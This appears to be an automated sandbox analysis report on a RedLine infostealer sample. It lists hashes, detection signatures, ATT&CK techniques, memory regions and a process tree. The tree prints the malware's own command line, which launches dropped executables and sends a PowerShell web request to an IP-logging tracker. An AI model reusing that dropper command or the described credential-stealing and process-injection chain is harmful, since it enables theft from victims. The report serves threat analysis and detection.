redline | 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f

Analysis

max time kernel
140s
max time network
150s
platform
windows10_x64
resource
win10v20201028
submitted
21-03-2021 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f5366963764901262499c8021333f986.exe
Size

1.1MB
MD5

f5366963764901262499c8021333f986
SHA1

e57b794220e7a6184614ccd4a6ddcf99de7e0717
SHA256

38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
SHA512

84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6

Score

10^/10

redline discovery infostealer spyware stealer

Malware Config

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1420-53-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline
behavioral2/memory/1420-54-0x0000000000421DFE-mapping.dmp	family_redline

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

21 3644 powershell.exe
Executes dropped EXE 5 IoCs

Processes:

hello_C# (2).exehello_C#.exejayson.exeriv.exejayson.exe

pid process

1244 hello_C# (2).exe
204 hello_C#.exe
2332 jayson.exe
3200 riv.exe
1420 jayson.exe
Loads dropped DLL 1 IoCs

Processes:

f5366963764901262499c8021333f986.exe

pid process

1152 f5366963764901262499c8021333f986.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

jayson.exe

description pid process target process

PID 2332 set thread context of 1420 2332 jayson.exe jayson.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes:

powershell.exe

pid process

3644 powershell.exe
3644 powershell.exe
3644 powershell.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exejayson.exe

description pid process

Token: SeDebugPrivilege 3644 powershell.exe
Token: SeDebugPrivilege 1420 jayson.exe

flow	pid	process
21	3644	powershell.exe

pid	process
1244	hello_C# (2).exe
204	hello_C#.exe
2332	jayson.exe
3200	riv.exe
1420	jayson.exe

pid	process
1152	f5366963764901262499c8021333f986.exe

description	pid	process	target process
PID 2332 set thread context of 1420	2332	jayson.exe	jayson.exe

pid	process
3644	powershell.exe
3644	powershell.exe
3644	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3644	powershell.exe
Token: SeDebugPrivilege	1420	jayson.exe

Suspicious use of WriteProcessMemory 24 IoCs

Processes:

f5366963764901262499c8021333f986.execmd.exejayson.exe

description	pid	process	target process
PID 1152 wrote to memory of 2844	1152	f5366963764901262499c8021333f986.exe	cmd.exe
PID 1152 wrote to memory of 2844	1152	f5366963764901262499c8021333f986.exe	cmd.exe
PID 1152 wrote to memory of 2844	1152	f5366963764901262499c8021333f986.exe	cmd.exe
PID 2844 wrote to memory of 1244	2844	cmd.exe	hello_C# (2).exe
PID 2844 wrote to memory of 1244	2844	cmd.exe	hello_C# (2).exe
PID 2844 wrote to memory of 204	2844	cmd.exe	hello_C#.exe
PID 2844 wrote to memory of 204	2844	cmd.exe	hello_C#.exe
PID 2844 wrote to memory of 2332	2844	cmd.exe	jayson.exe
PID 2844 wrote to memory of 2332	2844	cmd.exe	jayson.exe
PID 2844 wrote to memory of 2332	2844	cmd.exe	jayson.exe
PID 2844 wrote to memory of 3200	2844	cmd.exe	riv.exe
PID 2844 wrote to memory of 3200	2844	cmd.exe	riv.exe
PID 2844 wrote to memory of 3200	2844	cmd.exe	riv.exe
PID 2844 wrote to memory of 3644	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 3644	2844	cmd.exe	powershell.exe
PID 2844 wrote to memory of 3644	2844	cmd.exe	powershell.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe
PID 2332 wrote to memory of 1420	2332	jayson.exe	jayson.exe

C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe
"C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1152

C:\Windows\SysWOW64\cmd.exe
"cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
2⤵
- Suspicious use of WriteProcessMemory
PID:2844

C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe
"hello_C# (2).exe"
3⤵
- Executes dropped EXE
PID:1244

C:\Users\Admin\AppData\Local\Temp\jayson.exe
"jayson.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2332

C:\Users\Admin\AppData\Local\Temp\jayson.exe
"{path}"
4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Users\Admin\AppData\Local\Temp\hello_C#.exe
"hello_C#.exe"
3⤵
- Executes dropped EXE
PID:204

C:\Users\Admin\AppData\Local\Temp\riv.exe
"riv.exe"
3⤵
- Executes dropped EXE
PID:3200

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3644

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jayson.exe.log

MD5
0c2899d7c6746f42d5bbe088c777f94c

SHA1
622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1

SHA256
5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458

SHA512
ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe

MD5
d6b9f530e7e8ddebea8069a0d94ad38e

SHA1
28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67

SHA256
3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904

SHA512
2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815

Download Submit
C:\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\jayson.exe

MD5
68f70e9545a6dbeecd3e2eba38c197ca

SHA1
5d0fdc7452e3af1c4d7b145256888687e5fd2a72

SHA256
a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804

SHA512
99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\riv.exe

MD5
bd96d90751fd507c3af0edbe0d596ec4

SHA1
eed0bb7626d328190c7de701c0071f9c4ad048ef

SHA256
f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

SHA512
5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

Download Submit
C:\Users\Admin\AppData\Local\Temp\riv.exe

MD5
bd96d90751fd507c3af0edbe0d596ec4

SHA1
eed0bb7626d328190c7de701c0071f9c4ad048ef

SHA256
f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db

SHA512
5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338

Download Submit
\Users\Admin\AppData\Local\Temp\nsm64DB.tmp\YPUD2.dll

MD5
293165db1e46070410b4209519e67494

SHA1
777b96a4f74b6c34d43a4e7c7e656757d1c97f01

SHA256
49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a

SHA512
97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19

Download Submit
memory/204-18-0x00007FFB54E80000-0x00007FFB5586C000-memory.dmp

Filesize
9.9MB

Download
memory/204-20-0x0000000000580000-0x0000000000581000-memory.dmp

Filesize
4KB

Download
memory/204-6-0x0000000000000000-mapping.dmp

Download
memory/1244-19-0x00007FFB54E80000-0x00007FFB5586C000-memory.dmp

Filesize
9.9MB

Download
memory/1244-4-0x0000000000000000-mapping.dmp

Download
memory/1420-57-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/1420-67-0x00000000052D0000-0x00000000052D1000-memory.dmp

Filesize
4KB

Download
memory/1420-62-0x0000000002900000-0x0000000002901000-memory.dmp

Filesize
4KB

Download
memory/1420-54-0x0000000000421DFE-mapping.dmp

Download
memory/1420-66-0x0000000005080000-0x0000000005081000-memory.dmp

Filesize
4KB

Download
memory/1420-61-0x0000000001110000-0x0000000001111000-memory.dmp

Filesize
4KB

Download
memory/1420-65-0x0000000005040000-0x0000000005041000-memory.dmp

Filesize
4KB

Download
memory/1420-64-0x0000000004FE0000-0x0000000004FE1000-memory.dmp

Filesize
4KB

Download
memory/1420-53-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1420-63-0x00000000055F0000-0x00000000055F1000-memory.dmp

Filesize
4KB

Download
memory/2332-17-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/2332-51-0x0000000008AC0000-0x0000000008B56000-memory.dmp

Filesize
600KB

Download
memory/2332-30-0x0000000005370000-0x0000000005371000-memory.dmp

Filesize
4KB

Download
memory/2332-26-0x0000000005870000-0x0000000005871000-memory.dmp

Filesize
4KB

Download
memory/2332-23-0x0000000000A10000-0x0000000000A11000-memory.dmp

Filesize
4KB

Download
memory/2332-52-0x000000000B250000-0x000000000B2AE000-memory.dmp

Filesize
376KB

Download
memory/2332-38-0x0000000005560000-0x0000000005561000-memory.dmp

Filesize
4KB

Download
memory/2332-34-0x0000000005350000-0x0000000005351000-memory.dmp

Filesize
4KB

Download
memory/2332-39-0x0000000005810000-0x0000000005815000-memory.dmp

Filesize
20KB

Download
memory/2332-8-0x0000000000000000-mapping.dmp

Download
memory/2332-42-0x0000000008920000-0x0000000008921000-memory.dmp

Filesize
4KB

Download
memory/2844-3-0x0000000000000000-mapping.dmp

Download
memory/3200-44-0x0000000002690000-0x0000000002691000-memory.dmp

Filesize
4KB

Download
memory/3200-45-0x0000000000890000-0x00000000008C8000-memory.dmp

Filesize
224KB

Download
memory/3200-46-0x0000000000400000-0x000000000043A000-memory.dmp

Filesize
232KB

Download
memory/3200-10-0x0000000000000000-mapping.dmp

Download
memory/3644-32-0x0000000007270000-0x0000000007271000-memory.dmp

Filesize
4KB

Download
memory/3644-49-0x000000000A6E0000-0x000000000A6E1000-memory.dmp

Filesize
4KB

Download
memory/3644-50-0x0000000004703000-0x0000000004704000-memory.dmp

Filesize
4KB

Download
memory/3644-48-0x0000000008FC0000-0x0000000008FC1000-memory.dmp

Filesize
4KB

Download
memory/3644-47-0x00000000098B0000-0x00000000098B1000-memory.dmp

Filesize
4KB

Download
memory/3644-43-0x00000000082D0000-0x00000000082D1000-memory.dmp

Filesize
4KB

Download
memory/3644-41-0x0000000008110000-0x0000000008111000-memory.dmp

Filesize
4KB

Download
memory/3644-40-0x0000000007AB0000-0x0000000007AB1000-memory.dmp

Filesize
4KB

Download
memory/3644-37-0x0000000004702000-0x0000000004703000-memory.dmp

Filesize
4KB

Download
memory/3644-36-0x0000000004700000-0x0000000004701000-memory.dmp

Filesize
4KB

Download
memory/3644-35-0x0000000007BD0000-0x0000000007BD1000-memory.dmp

Filesize
4KB

Download
memory/3644-33-0x00000000072E0000-0x00000000072E1000-memory.dmp

Filesize
4KB

Download
memory/3644-31-0x00000000070D0000-0x00000000070D1000-memory.dmp

Filesize
4KB

Download
memory/3644-29-0x00000000073C0000-0x00000000073C1000-memory.dmp

Filesize
4KB

Download
memory/3644-28-0x0000000004760000-0x0000000004761000-memory.dmp

Filesize
4KB

Download
memory/3644-22-0x00000000730C0000-0x00000000737AE000-memory.dmp

Filesize
6.9MB

Download
memory/3644-14-0x0000000000000000-mapping.dmp

Download